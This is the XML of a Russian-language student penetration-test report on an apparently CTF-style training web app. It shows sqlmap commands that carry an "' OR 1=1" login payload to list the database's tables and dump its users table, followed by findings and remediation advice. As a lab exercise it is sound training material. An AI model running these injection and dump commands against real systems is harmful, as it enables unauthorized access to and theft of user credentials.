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63D078F6" w:rsidR="004C720F" w:rsidRPr="0086110E" w:rsidRDefault="004C720F" w:rsidP="00303AE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="150" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="0086110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тчет по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>пентесту</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00861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9E1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17.6</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0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</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00303AE1" w:rsidRPr="0086110E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Pr="0086110E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>(</w:t>
      </w:r>
      <w:r w:rsidR="00B02D38" w:rsidRPr="0086110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Задание </w:t>
      </w:r>
      <w:r w:rsidR="00AD79E1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17.6</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0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</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0E" w:rsidRPr="00CF6F0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2</w:t>
      </w:r>
      <w:r w:rsidR="009951E5" w:rsidRPr="0086110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18F9DCE2" w14:textId="0C523AA8" w:rsidR="004C720F" w:rsidRPr="0086110E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86110E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Персонализация: </w:t>
      </w:r>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Михайлов Юрий Никитич (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uramihajlov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>481@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B76D5" w14:textId="5C126D92" w:rsidR="004C720F" w:rsidRPr="0086110E" w:rsidRDefault="004C720F" w:rsidP="004C720F">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:before="240" w:after="240"/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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086110E"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303AE1" w:rsidRPr="0086110E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00EA6C1A">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>17.</w:t>
      </w:r>
      <w:r w:rsidR="00EA6C1A" w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B02D38" w:rsidRPr="0086110E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009951E5" w:rsidRPr="0086110E"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  <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA6C1A"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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>” :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086110E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86110E" w:rsidRDefault="004C720F" w:rsidP="009951E5">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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>Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504B2FEB" w14:textId="1373EDC4" w:rsidR="004C720F" w:rsidRPr="0086110E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 xml:space="preserve"> Период тестирования: </w:t>
      </w:r>
      <w:r w:rsidR="00CF6F0E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00B02D38" w:rsidRPr="00EA6C1A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.02</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C1A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A1D3D" w14:textId="2BEC50D8" w:rsidR="004C720F" w:rsidRPr="0086110E" w:rsidRDefault="004C720F" w:rsidP="007961CF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 xml:space="preserve">Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00CF6F0E" w:rsidRPr="00CF6F0E">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://51.250.73.193:5009</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="65286E75" w14:textId="55837E93" w:rsidR="00240FF8" w:rsidRPr="0086110E" w:rsidRDefault="004C720F" w:rsidP="009951E5">
      <w:pPr>
        <w:pStyle w:val="afb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>Описание действий:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6985AB76" w14:textId="77777777" w:rsidR="0086110E" w:rsidRDefault="0086110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1FA3CE42" w14:textId="77777777" w:rsidR="0086110E" w:rsidRDefault="0086110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491BC286" w14:textId="77777777" w:rsidR="0086110E" w:rsidRDefault="0086110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711982AC" w14:textId="77777777" w:rsidR="00CF6F0E" w:rsidRDefault="003F717B" w:rsidP="007D7623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  <w:r w:rsidRPr="0086110E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1 Этап:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290D687" w14:textId="77777777" w:rsidR="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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Сканируем</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6F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CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --flush -session -u http://51.250.73.193:5009 --data="login=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1" --method POST --tables -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66C827D5" wp14:editId="5A4E34CE">
            <wp:extent cx="6400800" cy="2972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227" w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED274D" w14:textId="77777777" w:rsidR="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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39D3A2A4" w14:textId="77777777" w:rsidR="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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5D6ACB0A" w14:textId="07134553" w:rsidR="007961CF" w:rsidRPr="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Этап</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957292B" w14:textId="6254E15A" w:rsidR="00CF6F0E" w:rsidRPr="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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Смотрим</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E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что</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E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в</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E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таблице</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E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Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://51.250.73.193:5009" --data="login=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1" --method POST -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EE7F2" w14:textId="2B24DBC5" w:rsidR="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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CF6F0E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78D121C5" wp14:editId="40878C79">
            <wp:extent cx="6400800" cy="3339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D7ED" w14:textId="414F7646" w:rsidR="00CF6F0E" w:rsidRPr="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E">
      <w:pPr>
        <w:pStyle w:val="afb"/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</w:rPr>
        <w:t xml:space="preserve"> Этап:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Проверяем логин</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пароль</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CF6F0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207926A9" wp14:editId="1E538214">
            <wp:extent cx="6400800" cy="2674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2110" w14:textId="77777777" w:rsidR="00CF6F0E" w:rsidRDefault="00CF6F0E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55BE74E" w14:textId="4C88AB72" w:rsidR="00240FF8" w:rsidRPr="0086110E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Используемые инструменты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C579AC" w14:textId="276DFBB5" w:rsidR="00240FF8" w:rsidRPr="0086110E" w:rsidRDefault="00EA6C1A" w:rsidP="0015611F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10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p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FF862F" w14:textId="6E6099B0" w:rsidR="00146E35" w:rsidRPr="0086110E" w:rsidRDefault="00742B5E" w:rsidP="00B0370A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Opera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF4ECE7" w14:textId="4603E981" w:rsidR="003D19C9" w:rsidRPr="0086110E" w:rsidRDefault="003D19C9" w:rsidP="00CF6F0E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0CC4FFF1" w14:textId="77777777" w:rsidR="006E0295" w:rsidRPr="0086110E" w:rsidRDefault="006E0295" w:rsidP="00240FF8">
      <w:pPr>
        <w:spacing w:before="24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7AF6F079" w14:textId="77777777" w:rsidR="007961CF" w:rsidRDefault="007961C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88D79A5" w14:textId="67F69D21" w:rsidR="00240FF8" w:rsidRPr="0086110E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наруженные уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D176F" w14:textId="2B9F561F" w:rsidR="003D19C9" w:rsidRDefault="007961CF" w:rsidP="003D19C9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 w:rsidRPr="007961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SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="007961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инъекции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7A14E" w14:textId="42BB75EF" w:rsidR="00CF6F0E" w:rsidRPr="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="003D19C9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 w:rsidRPr="00CF6F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Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA83868" w14:textId="77777777" w:rsidR="00CF6F0E" w:rsidRPr="00CF6F0E" w:rsidRDefault="00CF6F0E" w:rsidP="00CF6F0E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</w:p>
    <w:p w14:paraId="4CC42A0D" w14:textId="40071994" w:rsidR="00240FF8" w:rsidRPr="0086110E" w:rsidRDefault="00240FF8" w:rsidP="003D19C9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айте совет по улучшению защиты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E594DF9" w14:textId="210F6F02" w:rsidR="00C403F4" w:rsidRPr="0086110E" w:rsidRDefault="00C403F4" w:rsidP="00C403F4">
      <w:pPr>
        <w:spacing w:before="240" w:after="2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0ACFC658" w14:textId="3EFF6A10" w:rsidR="0084365D" w:rsidRDefault="003D19C9" w:rsidP="007961CF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идация</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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фильтрация ввода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794AB9F" w14:textId="47D8E881" w:rsidR="007961CF" w:rsidRPr="007961CF" w:rsidRDefault="007961CF" w:rsidP="007961CF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Используйте</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796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параметризованные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796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запросы</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="675C77AD" w14:textId="1AEF743E" w:rsidR="007961CF" w:rsidRPr="007961CF" w:rsidRDefault="007961CF" w:rsidP="007961CF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Ограничьте</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796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привилегии</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796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базы</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796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proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="007961CF" w:rsidRPr="007961CF" w:rsidSect="005709A0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22F05" w14:textId="77777777" w:rsidR="00621D41" w:rsidRDefault="00621D41" w:rsidP="00D7617F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="542E5165" w14:textId="77777777" w:rsidR="00621D41" w:rsidRDefault="00621D41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78AFFE0-C4AC-4F55-9DB2-CCEB4421844A}"/>
    <w:embedBold r:id="rId2" w:fontKey="{E4187B0F-24F3-4E35-A7C9-361E5C99130A}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{AEB6BA05-64ED-41A1-BA62-6C3412084523}"/>
    <w:embedBoldItalic r:id="rId4" w:fontKey="{F3A3AEF1-1C9F-4C85-A96B-392340EDFDC3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64AE0FB6-3DF8-4F4B-A188-D3CFB0E579DF}"/>
    <w:embedBold r:id="rId6" w:fontKey="{308FC328-4E20-4E97-A08C-16E6E9C5B2D2}"/>
    <w:embedItalic r:id="rId7" w:fontKey="{F4AAA19E-B299-4E1A-806C-F7FE0BB6B995}"/>
    <w:embedBoldItalic r:id="rId8" w:fontKey="{AFEF7A6F-A185-468A-9659-F8C6887DDBDC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9D5D6BF6-D4B8-4908-BB9F-981A7CFB47C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35585B67-1C2F-4A9C-BB10-BE30C69759BF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B77A91BF-FE32-4857-913D-644A6B2C414C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D0407A17-5CC2-4F5C-B688-61BC4481B81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81B9E" w14:textId="77777777" w:rsidR="00621D41" w:rsidRDefault="00621D41" w:rsidP="00D7617F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BE539E0" w14:textId="77777777" w:rsidR="00621D41" w:rsidRDefault="00621D41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34BE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0102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61374"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09E8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1B1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46E35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465C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3AE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865CA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19C9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3F717B"/>
    <w:rsid w:val="0040263E"/>
    <w:rsid w:val="00402AEF"/>
    <w:rsid w:val="004039E4"/>
    <w:rsid w:val="00404980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001C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10C9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072B2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1D41"/>
    <w:rsid w:val="00623724"/>
    <w:rsid w:val="0062676F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295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2B5E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961C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623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41391"/>
    <w:rsid w:val="00843100"/>
    <w:rsid w:val="0084365D"/>
    <w:rsid w:val="00843822"/>
    <w:rsid w:val="008569F1"/>
    <w:rsid w:val="008609CE"/>
    <w:rsid w:val="00860DEB"/>
    <w:rsid w:val="0086110E"/>
    <w:rsid w:val="0086372A"/>
    <w:rsid w:val="008643C6"/>
    <w:rsid w:val="00870B8B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4E"/>
    <w:rsid w:val="008E55B4"/>
    <w:rsid w:val="008E5861"/>
    <w:rsid w:val="008F7912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A6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0751"/>
    <w:rsid w:val="009951E5"/>
    <w:rsid w:val="00995FFC"/>
    <w:rsid w:val="00996A31"/>
    <w:rsid w:val="009A3FC9"/>
    <w:rsid w:val="009A471E"/>
    <w:rsid w:val="009A5DD1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5EE7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B2227"/>
    <w:rsid w:val="00AC33B2"/>
    <w:rsid w:val="00AC5929"/>
    <w:rsid w:val="00AD1893"/>
    <w:rsid w:val="00AD3DED"/>
    <w:rsid w:val="00AD750F"/>
    <w:rsid w:val="00AD79E1"/>
    <w:rsid w:val="00AE0B59"/>
    <w:rsid w:val="00AE4A34"/>
    <w:rsid w:val="00AE6BEA"/>
    <w:rsid w:val="00AF4A93"/>
    <w:rsid w:val="00B00532"/>
    <w:rsid w:val="00B0185C"/>
    <w:rsid w:val="00B02D38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3F4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D05B5"/>
    <w:rsid w:val="00CD467F"/>
    <w:rsid w:val="00CD48D9"/>
    <w:rsid w:val="00CD50C7"/>
    <w:rsid w:val="00CE051E"/>
    <w:rsid w:val="00CE0E52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CF6F0E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00F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482B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A6C1A"/>
    <w:rsid w:val="00EC21D6"/>
    <w:rsid w:val="00EC497A"/>
    <w:rsid w:val="00ED2646"/>
    <w:rsid w:val="00ED3421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35C0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4B1E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1.250.73.193:500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C8D2-4C92-4245-8F28-0B61179B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22:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-15T22:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>